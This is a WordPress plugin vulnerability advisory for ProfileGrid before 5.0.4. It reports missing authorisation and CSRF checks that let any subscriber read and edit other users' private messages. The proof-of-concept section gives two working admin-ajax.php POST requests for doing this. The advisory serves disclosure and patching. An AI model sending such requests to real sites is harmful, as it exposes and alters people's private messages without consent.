ProfileGrid < 5.0.4 – Subscriber+ Private Message Read/Edition | Plugin Vulnerabilities

Description

The plugin does not have any authorisation and CSRF checks when accessing and editing messages, which could allow any logged in users, such as subscriber to access and edit arbitrary messages

Proof of Concept

To access messages:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_show_messages&tid=1


To edit a message:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_send_new_message&tid=1&rid=-&mid=1&content=message1%20from%20user1%20to%20user2%20(edited%20by%20spy)&_wpnonce=b5faed947c

Affects Plugins

profilegrid-user-profiles-groups-and-communities

Fixed in 5.0.4

References

URL

https://lana.codes/lanavdb/22ebfe5c-9725-4152-a54d-89b51c8b0fbd/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Code

Verified

Yes

WPVDB ID

b76e1953-95db-4cd9-99c9-58922db2109a

Timeline

Publicly Published

2022-10-27 (about 3 years ago)

Added

2022-10-27 (about 3 years ago)

Last Updated

2022-10-27 (about 3 years ago)

Other

Published

Title

Published

2025-02-03

Title

WP Custom Post RSS Feed <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-06-19

Title

Oganro Travel Portal Search Widget for HotelBeds APITUDE API <= 1.0 - Cross-Site Request Forgery

Published

2023-02-28

Title

HT Slider For Elementor < 1.4.0 - Arbitrary Plugin Activation via CSRF

Published

2024-04-10

Title

EWWW Image Optimizer < 7.3.0 - Cross-Site Request Forgery

Published

2022-11-08

Title

3DPrint < 3.5.6.9 - Arbitrary File and Directory Deletion via CSRF